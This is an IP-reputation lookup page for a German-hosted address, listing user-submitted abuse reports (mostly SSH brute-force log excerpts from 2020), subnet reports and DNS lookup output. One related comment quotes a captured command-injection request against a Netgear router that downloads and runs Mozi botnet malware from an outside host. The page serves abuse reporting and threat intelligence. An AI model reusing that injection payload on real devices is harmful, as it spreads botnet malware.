45.136.108.85 - IPInfo

Basic Info

City: unknown

Region: unknown

Country: Germany

Internet Service Provider: ComTrade LLC

Hostname: unknown

Organization: unknown

Usage Type: Commercial

Comments:

Make a comment on this IP

Type	Details	Datetime
attackspam	465. On May 17 2020 experienced a Brute Force SSH login attempt -> 125 unique times by 45.136.108.85.	2020-05-20 21:03:10
attackspambots	sshd jail - ssh hack attempt	2020-05-14 08:53:19
attackbotsspam	May 07 10:19:10 host sshd[16047]: Invalid user 0 from 45.136.108.85 port 49712	2020-05-12 16:32:44
attackspam	May 7 00:10:32 sip sshd[142839]: Invalid user 0 from 45.136.108.85 port 20558 May 7 00:10:35 sip sshd[142839]: Failed password for invalid user 0 from 45.136.108.85 port 20558 ssh2 May 7 00:10:37 sip sshd[142839]: Disconnecting invalid user 0 45.136.108.85 port 20558: Change of username or service not allowed: (0,ssh-connection) -> (22,ssh-connection) [preauth] ...	2020-05-07 06:56:56
attack	May 4 10:46:37 nextcloud sshd\[15017\]: Invalid user 0 from 45.136.108.85 May 4 10:46:37 nextcloud sshd\[15017\]: pam_unix$sshd:auth$: authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=45.136.108.85 May 4 10:46:39 nextcloud sshd\[15017\]: Failed password for invalid user 0 from 45.136.108.85 port 11708 ssh2	2020-05-04 17:24:42
attackbots	2020-05-01 13:22:36 server sshd[5136]: Failed password for invalid user 0 from 45.136.108.85 port 21008 ssh2	2020-05-03 03:50:10
attack	Invalid user 0 from 45.136.108.85 port 45007	2020-04-30 06:28:49
attackbots	Apr 28 00:15:58 ubuntu sshd[14083]: Invalid user 0 from 45.136.108.85 port 28288 Apr 28 00:16:01 ubuntu sshd[14083]: Failed password for invalid user 0 from 45.136.108.85 port 28288 ssh2 Apr 28 00:16:03 ubuntu sshd[14083]: Disconnecting invalid user 0 45.136.108.85 port 28288: Change of username or service not allowed: (0,ssh-connection) -> (22,ssh-connection) [preauth] ...	2020-04-28 08:16:59
attackspambots	Apr 27 08:31:04 v22018053744266470 sshd[10038]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=45.136.108.85 Apr 27 08:31:06 v22018053744266470 sshd[10038]: Failed password for invalid user 0 from 45.136.108.85 port 24282 ssh2 Apr 27 08:31:09 v22018053744266470 sshd[10045]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=45.136.108.85 ...	2020-04-27 14:52:58
attackspambots	Apr 19 22:28:22 : SSH login attempts with invalid user	2020-04-24 06:13:59
attackspam	...	2020-04-20 07:56:10
attack	$f2bV_matches	2020-04-16 19:28:53
attackspambots	Fail2Ban	2020-04-16 00:42:31
attackspam	...	2020-04-14 16:55:56
attack	Apr 14 00:29:16 legacy sshd[840]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=45.136.108.85 Apr 14 00:29:18 legacy sshd[840]: Failed password for invalid user 0 from 45.136.108.85 port 41470 ssh2 Apr 14 00:29:23 legacy sshd[851]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=45.136.108.85 ...	2020-04-14 07:05:06
attackspambots	April 12 2020, 08:40:00 [sshd] - Banned from the Cipher Host hosting platform by Fail2ban.	2020-04-12 19:16:56
attackspam	Fail2Ban Ban Triggered (2)	2020-04-09 00:06:44
attackspam	April 05 2020, 14:25:50 [sshd] - Banned from the Cipher Host hosting platform by Fail2ban.	2020-04-05 23:32:05
attackbotsspam	Apr 5 11:34:14 karger sshd[27230]: Connection from 45.136.108.85 port 20529 on 188.68.60.164 port 22 Apr 5 11:34:14 karger sshd[27230]: Invalid user 0 from 45.136.108.85 port 20529 Apr 5 11:34:16 karger sshd[27232]: Connection from 45.136.108.85 port 2658 on 188.68.60.164 port 22 Apr 5 11:34:20 karger sshd[27232]: Invalid user 22 from 45.136.108.85 port 2658 Apr 5 11:34:23 karger sshd[27234]: Connection from 45.136.108.85 port 51925 on 188.68.60.164 port 22 Apr 5 11:34:25 karger sshd[27234]: Invalid user 101 from 45.136.108.85 port 51925 Apr 5 11:34:26 karger sshd[27236]: Connection from 45.136.108.85 port 35992 on 188.68.60.164 port 22 Apr 5 11:34:28 karger sshd[27236]: Invalid user 123 from 45.136.108.85 port 35992 Apr 5 11:34:29 karger sshd[27242]: Connection from 45.136.108.85 port 1218 on 188.68.60.164 port 22 Apr 5 11:34:31 karger sshd[27242]: Invalid user 1111 from 45.136.108.85 port 1218 ...	2020-04-05 17:48:29
attackspam	Apr 2 20:38:13 www sshd\[9515\]: Invalid user 0 from 45.136.108.85 Apr 2 20:38:20 www sshd\[9517\]: Invalid user 22 from 45.136.108.85 ...	2020-04-03 08:55:32
attackspambots	01.04.2020 18:40:27 SSH access blocked by firewall	2020-04-02 03:37:50
attack	Apr 1 04:04:29 server sshd\[31916\]: Invalid user 0 from 45.136.108.85 Apr 1 04:04:29 server sshd\[31916\]: pam_unix$sshd:auth$: authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=45.136.108.85 Apr 1 04:04:30 server sshd\[31916\]: Failed password for invalid user 0 from 45.136.108.85 port 32571 ssh2 Apr 1 04:04:31 server sshd\[31917\]: Failed password for invalid user 0 from 45.136.108.85 port 42421 ssh2 Apr 1 12:03:57 server sshd\[19664\]: Invalid user 0 from 45.136.108.85 Apr 1 12:03:57 server sshd\[19664\]: pam_unix$sshd:auth$: authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=45.136.108.85 ...	2020-04-01 19:40:51
attackbots	Mar 28 02:38:12 yolandtech-ams3 sshd\[2619\]: Invalid user 0 from 45.136.108.85 Mar 28 02:38:14 yolandtech-ams3 sshd\[2621\]: Invalid user 22 from 45.136.108.85 Mar 28 02:38:15 yolandtech-ams3 sshd\[2623\]: Invalid user 101 from 45.136.108.85 Mar 28 02:38:19 yolandtech-ams3 sshd\[2625\]: Invalid user 123 from 45.136.108.85 Mar 28 02:38:24 yolandtech-ams3 sshd\[2627\]: Invalid user 1111 from 45.136.108.85 ...	2020-03-28 14:45:32
attackbots	$f2bV_matches	2020-03-23 05:20:41
attackbots	20/3/22@02:12:13: FAIL: Alarm-SSH address from=45.136.108.85 ...	2020-03-22 14:44:34
attackbots	SSH authentication failure x 6 reported by Fail2Ban ...	2020-03-20 14:23:02
attackbots	Brute-force attempt banned	2020-03-14 08:19:54
attackbotsspam	SSH_scan	2020-03-06 13:44:14
attackspambots	Mar 5 11:41:17 vps647732 sshd[19388]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=45.136.108.85 Mar 5 11:41:19 vps647732 sshd[19388]: Failed password for invalid user 0 from 45.136.108.85 port 8600 ssh2 ...	2020-03-05 19:05:33
attackbotsspam	$f2bV_matches	2020-03-05 00:46:41

Comments on same subnet:

IP	Type	Details	Datetime
45.136.108.22	attackspambots	45.136.108.22 - - [31/Aug/2020:07:28:26 -0500] "- / HTTP/1.0" 400 219 000 0 0 0 15 282 0 0 0 NONE FIN FIN ERR_INVALID_REQ	2020-09-01 04:38:43
45.136.108.22	attack	Unauthorized connection attempt from IP address 45.136.108.22 on port 993	2020-08-29 02:06:36
45.136.108.24	attackspambots	SSH login attempts.	2020-08-22 23:35:58
45.136.108.22	attackspambots	Fail2Ban Ban Triggered	2020-08-19 09:11:16
45.136.108.65	attack	[14/Aug/2020:05:14:56 -0400] "\x03" Blank UA	2020-08-16 04:36:35
45.136.108.67	attack	Unauthorized connection attempt detected from IP address 45.136.108.67 to port 2261 [T]	2020-08-16 04:36:18
45.136.108.24	attackspam	Unauthorized connection attempt detected from IP address 45.136.108.24 to port 4453 [T]	2020-08-14 02:36:09
45.136.108.65	attackbotsspam	Unauthorized connection attempt detected from IP address 45.136.108.65 to port 968 [T]	2020-08-14 02:12:50
45.136.108.66	attackbotsspam	Unauthorized connection attempt detected from IP address 45.136.108.66 to port 1723 [T]	2020-08-14 02:12:33
45.136.108.68	attack	Unauthorized connection attempt detected from IP address 45.136.108.68 to port 3424 [T]	2020-08-14 02:12:09
45.136.108.22	attackbotsspam	Port scan detected	2020-08-14 01:49:56
45.136.108.67	attackspambots	Unauthorized connection attempt detected from IP address 45.136.108.67 to port 2925 [T]	2020-08-14 01:49:28
45.136.108.62	attack	Unauthorized connection attempt detected from IP address 45.136.108.62 to port 9055 [T]	2020-08-14 01:07:35
45.136.108.80	attackspambots	2020-08-12T12:42:42Z - RDP login failed multiple times. (45.136.108.80)	2020-08-12 22:09:08
45.136.108.18	attack	RDP brute forcing (r)	2020-08-04 21:39:59

Whois info:

Dig info:

; <<>> DiG 9.10.3-P4-Ubuntu <<>> 45.136.108.85
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 3330
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;45.136.108.85.			IN	A

;; AUTHORITY SECTION:
.			408	IN	SOA	a.root-servers.net. nstld.verisign-grs.com. 2019111201 1800 900 604800 86400

;; Query time: 119 msec
;; SERVER: 183.60.83.19#53(183.60.83.19)
;; WHEN: Wed Nov 13 04:42:51 CST 2019
;; MSG SIZE  rcvd: 117

Host info

Host 85.108.136.45.in-addr.arpa. not found: 3(NXDOMAIN)

Nslookup info:

Server:		183.60.83.19
Address:	183.60.83.19#53

** server can't find 85.108.136.45.in-addr.arpa: NXDOMAIN

Related IP info:

Related comments:

IP	Type	Details	Datetime
47.115.54.160	attackspambots	Attempts against non-existent wp-login	2020-10-01 12:09:13
49.235.11.137	attack	(sshd) Failed SSH login from 49.235.11.137 (CN/China/-): 5 in the last 3600 secs	2020-10-01 09:15:07
35.207.15.14	attackspam	SSH brute-force attempt	2020-10-01 12:07:25
191.232.193.0	attack	sshguard	2020-10-01 09:10:18
222.223.32.228	attackspambots	Sep 30 22:44:55 ajax sshd[20004]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=222.223.32.228 Sep 30 22:44:58 ajax sshd[20004]: Failed password for invalid user bala from 222.223.32.228 port 50048 ssh2	2020-10-01 12:01:26
101.231.146.36	attackspambots	Invalid user deploy from 101.231.146.36 port 63323	2020-10-01 09:11:22
157.230.13.169	attack	Invalid user admin from 157.230.13.169 port 48678	2020-10-01 08:55:43
103.79.165.153	attack	GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://103.79.165.153:45258/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 HTTP/1.0	2020-10-01 09:09:43
180.168.47.238	attackspambots	2020-10-01T03:35:33.247951mail.standpoint.com.ua sshd[5123]: Invalid user storm from 180.168.47.238 port 38395 2020-10-01T03:35:33.251037mail.standpoint.com.ua sshd[5123]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=180.168.47.238 2020-10-01T03:35:33.247951mail.standpoint.com.ua sshd[5123]: Invalid user storm from 180.168.47.238 port 38395 2020-10-01T03:35:35.348489mail.standpoint.com.ua sshd[5123]: Failed password for invalid user storm from 180.168.47.238 port 38395 ssh2 2020-10-01T03:40:56.214816mail.standpoint.com.ua sshd[5877]: Invalid user activemq from 180.168.47.238 port 55801 ...	2020-10-01 08:49:40
117.27.88.61	attack	Oct 1 02:15:40 ns382633 sshd\[6684\]: pam_unix$sshd:auth$: authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=117.27.88.61 user=root Oct 1 02:15:42 ns382633 sshd\[6684\]: Failed password for root from 117.27.88.61 port 2999 ssh2 Oct 1 02:19:44 ns382633 sshd\[7203\]: Invalid user zf from 117.27.88.61 port 3000 Oct 1 02:19:44 ns382633 sshd\[7203\]: pam_unix$sshd:auth$: authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=117.27.88.61 Oct 1 02:19:46 ns382633 sshd\[7203\]: Failed password for invalid user zf from 117.27.88.61 port 3000 ssh2	2020-10-01 08:50:19
177.154.226.89	attackspam	(smtpauth) Failed SMTP AUTH login from 177.154.226.89 (BR/Brazil/-): 1 in the last 3600 secs; Ports: *; Direction: inout; Trigger: LF_TRIGGER; Logs: 2020-10-01 00:11:51 plain authenticator failed for ([177.154.226.89]) [177.154.226.89]: 535 Incorrect authentication data (set_id=info)	2020-10-01 12:10:48
213.217.0.184	attackspambots	IP 213.217.0.184 attacked honeypot on port: 80 at 9/29/2020 10:33:45 PM	2020-10-01 09:07:30
116.178.28.2	attackbots	Oct 1 00:47:41 takio sshd[10065]: error: maximum authentication attempts exceeded for root from 116.178.28.2 port 56838 ssh2 [preauth] Oct 1 00:47:47 takio sshd[10070]: error: maximum authentication attempts exceeded for root from 116.178.28.2 port 57521 ssh2 [preauth] Oct 1 00:47:56 takio sshd[10081]: Invalid user admin from 116.178.28.2 port 58500	2020-10-01 09:01:55
177.73.3.206	attack	Ssh brute force	2020-10-01 09:10:41
192.35.168.238	attack	Fail2Ban Ban Triggered	2020-10-01 09:08:44

Recently Reported IPs

214.111.185.138	177.66.70.93	111.234.196.12	127.75.203.186
188.17.166.121	233.185.96.129	163.171.37.78	185.37.115.83
166.78.41.53	238.85.98.29	205.16.16.20	56.144.141.162
163.212.3.66	183.229.39.139	34.89.192.105	44.211.114.218
205.230.105.171	42.60.109.198	100.33.35.135	115.128.15.130